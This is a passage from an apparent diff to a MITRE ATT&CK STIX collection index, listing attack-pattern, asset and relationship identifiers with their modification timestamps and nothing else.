"object_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "object_modified": "2024-02-14T21:00:00.467Z" + }, + { + "object_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "object_modified": "2023-10-13T17:57:11.152Z" + }, + { + "object_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "object_modified": "2024-02-28T21:08:56.520Z" + }, + { + "object_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "object_modified": "2023-07-28T18:17:34.185Z" + }, + { + "object_ref": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", + "object_modified": "2024-04-18T20:53:46.175Z" + }, + { + "object_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", + "object_modified": "2023-09-30T20:24:19.357Z" + }, + { + "object_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "object_modified": "2024-05-13T23:51:22.625Z" + }, + { + "object_ref": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", + "object_modified": "2022-10-18T22:44:01.723Z" + }, + { + "object_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "object_modified": "2024-03-01T17:35:02.889Z" + }, + { + "object_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d21bb61f-08ad-4dc1-b001-81ca6cb79954", + "object_modified": "2023-04-14T20:04:42.893Z" + }, + { + "object_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "object_modified": "2024-03-01T16:27:47.391Z" + }, + { + "object_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "object_modified": "2023-10-03T17:30:32.192Z" + }, + { + "object_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "object_modified": "2024-04-11T15:53:00.577Z" + }, + { + "object_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "object_modified": "2023-07-14T14:01:41.475Z" + }, + { + "object_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "object_modified": "2023-10-13T17:57:11.536Z" + }, + { + "object_ref": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "object_modified": "2023-10-13T17:57:11.730Z" + }, + { + "object_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7", + "object_modified": "2024-04-12T03:27:48.171Z" + }, + { + "object_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "object_modified": "2024-04-28T15:52:44.332Z" + }, + { + "object_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "object_modified": "2024-04-16T12:22:29.150Z" + }, + { + "object_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "object_modified": "2023-03-30T21:01:48.113Z" + }, + { + "object_ref": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", + "object_modified": "2022-10-20T21:19:57.555Z" + }, + { + "object_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "object_modified": "2024-04-16T12:28:21.234Z" + }, + { + "object_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "object_modified": "2024-02-15T14:19:22.282Z" + }, + { + "object_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "object_modified": "2023-08-14T15:37:02.771Z" + }, + { + "object_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "object_modified": "2024-01-31T20:46:43.215Z" + }, + { + "object_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "object_modified": "2023-10-16T16:35:12.501Z" + }, + { + "object_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "object_modified": "2023-10-13T17:57:11.924Z" + }, + { + "object_ref": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "object_modified": "2024-01-31T20:05:44.075Z" + }, + { + "object_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "object_modified": "2023-10-13T17:57:12.125Z" + }, + { + "object_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "object_modified": "2023-10-13T17:57:12.329Z" + }, + { + "object_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "object_modified": "2023-08-14T19:08:59.741Z" + }, + { + "object_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "object_modified": "2023-08-11T21:10:09.547Z" + }, + { + "object_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "object_modified": "2022-10-21T14:32:05.257Z" + }, + { + "object_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "object_modified": "2024-04-16T00:16:06.689Z" + }, + { + "object_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "object_modified": "2024-04-19T04:25:33.300Z" + }, + { + "object_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "object_modified": "2023-03-30T21:01:52.873Z" + }, + { + "object_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", + "object_modified": "2023-03-13T20:35:52.302Z" + }, + { + "object_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "object_modified": "2023-10-13T17:57:12.528Z" + }, + { + "object_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "object_modified": "2023-07-28T18:24:16.246Z" + }, + { + "object_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "object_modified": "2024-04-11T15:08:01.731Z" + }, + { + "object_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "object_modified": "2023-10-13T17:57:12.723Z" + }, + { + "object_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "object_modified": "2024-04-18T23:51:40.464Z" + }, + { + "object_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "object_modified": "2023-10-13T17:57:12.926Z" + }, + { + "object_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "object_modified": "2024-01-03T15:46:06.706Z" + }, + { + "object_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", + "object_modified": "2024-03-05T16:13:38.643Z" + }, + { + "object_ref": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", + "object_modified": "2024-04-17T00:02:12.021Z" + }, + { + "object_ref": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "object_modified": "2023-09-30T21:28:45.038Z" + }, + { + "object_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "object_modified": "2024-03-29T14:04:50.569Z" + }, + { + "object_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "object_modified": "2023-10-13T17:57:13.327Z" + }, + { + "object_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "object_modified": "2023-08-07T14:23:30.265Z" + }, + { + "object_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "object_modified": "2024-04-18T19:44:00.603Z" + }, + { + "object_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "object_modified": "2024-04-19T04:27:31.884Z" + }, + { + "object_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "object_modified": "2024-04-16T12:41:55.175Z" + }, + { + "object_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "object_modified": "2023-07-28T14:41:38.908Z" + }, + { + "object_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "object_modified": "2023-10-13T17:57:13.531Z" + }, + { + "object_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "object_modified": "2024-04-28T15:43:18.080Z" + }, + { + "object_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "object_modified": "2023-08-14T15:53:00.999Z" + }, + { + "object_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "object_modified": "2024-03-29T15:42:13.499Z" + }, + { + "object_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "object_modified": "2024-02-14T21:56:34.831Z" + }, + { + "object_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "object_modified": "2023-03-30T21:01:46.538Z" + }, + { + "object_ref": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "object_modified": "2024-04-16T12:50:15.929Z" + }, + { + "object_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "object_modified": "2023-11-15T14:38:10.876Z" + }, + { + "object_ref": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "object_modified": "2023-08-11T21:34:38.558Z" + }, + { + "object_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "object_modified": "2024-04-11T21:51:44.851Z" + }, + { + "object_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "object_modified": "2022-08-31T17:30:05.440Z" + }, + { + "object_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "object_modified": "2024-04-12T02:30:08.379Z" + }, + { + "object_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "object_modified": "2024-01-31T14:15:55.690Z" + }, + { + "object_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "object_modified": "2024-03-07T14:29:02.408Z" + }, + { + "object_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "object_modified": "2024-02-02T20:10:01.862Z" + }, + { + "object_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", + "object_modified": "2022-07-22T18:51:42.238Z" + }, + { + "object_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "object_modified": "2023-10-13T17:57:13.719Z" + }, + { + "object_ref": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "object_modified": "2024-04-09T20:51:03.049Z" + }, + { + "object_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "object_modified": "2023-10-13T17:57:14.123Z" + }, + { + "object_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "object_modified": "2024-04-16T13:00:33.303Z" + }, + { + "object_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "object_modified": "2023-10-20T17:01:10.138Z" + }, + { + "object_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "object_modified": "2023-07-14T13:04:04.591Z" + }, + { + "object_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "object_modified": "2023-10-15T11:41:47.274Z" + }, + { + "object_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "object_modified": "2022-10-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "object_modified": "2023-10-04T18:07:59.333Z" + }, + { + "object_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "object_modified": "2023-10-04T18:03:06.811Z" + }, + { + "object_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "object_modified": "2023-10-04T18:05:43.237Z" + }, + { + "object_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "object_modified": "2024-06-24T14:49:31.477Z" + }, + { + "object_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "object_modified": "2023-10-04T19:26:49.788Z" + }, + { + "object_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "object_modified": "2024-05-21T16:23:41.133Z" + }, + { + "object_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "object_modified": "2023-10-04T17:59:11.489Z" + }, + { + "object_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "object_modified": "2024-05-30T15:19:02.847Z" + }, + { + "object_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "object_modified": "2024-05-30T15:26:58.383Z" + }, + { + "object_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "object_modified": "2023-10-04T18:08:33.386Z" + }, + { + "object_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "object_modified": "2023-10-16T18:49:08.504Z" + }, + { + "object_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "object_modified": "2023-10-04T18:01:02.506Z" + }, + { + "object_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "object_modified": "2024-06-24T14:45:36.793Z" + }, + { + "object_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "object_modified": "2024-05-30T15:21:30.103Z" + }, + { + "object_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "object_modified": "2023-10-04T17:46:20.340Z" + }, + { + "object_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "object_modified": "2023-10-04T18:09:21.296Z" + }, + { + "object_ref": "x-mitre-asset--a2747432-b914-4bfb-b905-ef44f446a3ff", + "object_modified": "2024-05-30T15:28:49.087Z" + }, + { + "object_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "object_modified": "2024-05-30T15:29:20.916Z" + }, + { + "object_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "object_modified": "2024-05-30T15:24:40.201Z" + }, + { + "object_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "object_modified": "2023-10-04T17:57:56.558Z" + }, + { + "object_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "object_modified": "2023-10-04T18:09:59.538Z" + }, + { + "object_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "object_modified": "2023-09-28T14:23:52.358Z" + }, + { + "object_ref": "relationship--0005d8b9-4e84-4d90-9e2f-c7f7bf3ce97f", + "object_modified": "2024-07-02T13:55:55.753Z" + }, + { + "object_ref": "relationship--0020bed6-9cce-46ad-93b9-df9d4aaefa38", + "object_modified": "2024-07-02T13:55:55.758Z" + }, + { + "object_ref": "relationship--004329dd-2f92-40c2-87db-cb920c11da4f", + "object_modified": "2024-07-02T13:55:55.755Z" + }, + { + "object_ref": "relationship--0047bb3d-b5fa-4726-8b4c-4a5bbd590a7e", + "object_modified": "2024-06-27T09:33:16.486Z" + }, + { + "object_ref": "relationship--004bfbd6-91fc-4ee9-a414-1c8baae955b8", + "object_modified": "2024-06-21T14:12:20.263Z" + }, + { + "object_ref": "relationship--0074496b-286f-450b-86b5-b5a0a3cc27fe", + "object_modified": "2024-07-02T13:55:55.755Z" + }, + { + "object_ref": "relationship--007a2c53-fc5c-4750-aff0-defb282e178a", + "object_modified": "2023-09-29T16:30:30.829Z" + }, + { + "object_ref": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--008e82ae-654b-48a5-b633-7fc98c851b99", + "object_modified": "2024-07-02T13:55:55.760Z" + }, + { + "object_ref": "relationship--00aef3f2-ddd6-489b-a5ba-e4c508ea3a38", + "object_modified": "2024-07-02T13:55:55.753Z" + }, + { + "object_ref": "relationship--00d0e755-693d-46c0-b659-7ae11d22ae31", + "object_modified": "2024-07-02T13:55:55.762Z" + }, + { + "object_ref": "relationship--00d166a1-cc7f-4889-940c-fa3ebdfd08b1", + "object_modified": "2024-07-02T13:55:55.759Z" + }, + { + "object_ref": "relationship--00e43630-5236-4929-bdd6-9f0117887bb2", + "object_modified": "2024-06-27T09:23:30.920Z" + }, + { + "object_ref": "relationship--00ee14fc-2de4-4c99-b9cb-e2e23ed273fa", + "object_modified": "2024-07-02T13:55:55.751Z" + }, + { + "object_ref": "relationship--0101b8f9-5b15-4c5a-b841-391dc953d6cf", + "object_modified": "2024-07-02T13:55:55.749Z" + }, + { + "object_ref": "relationship--010f86d5-9292-485a-ad86-9c557e6ee5fa", + "object_modified": 